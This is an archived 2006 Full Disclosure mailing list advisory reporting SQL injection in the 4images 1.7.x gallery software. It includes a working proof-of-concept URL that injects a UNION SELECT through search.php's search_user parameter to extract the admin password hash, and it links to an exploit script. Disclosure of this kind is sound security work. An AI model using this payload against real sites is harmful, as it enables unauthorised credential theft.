Full Disclosure mailing list archives
SQL injection - 4images
From: disfigure <disfigure () gmail com>
Date: Sun, 8 Oct 2006 16:20:08 -0500
/****************************************/ http://www.w4cking.com Product: 4images 1.7.x http://www.4homepages.de Vulnerability: SQL injection Notes: - SQL injection can be used to obtain password hash - for version 1.7.3, you must log in as a registered user POC: <target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN Original advisory with exploit script (requires registration): http://w4ck1ng.com/board/showthread.php?t=1037 /****************************************/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- SQL injection - 4images disfigure (Oct 08)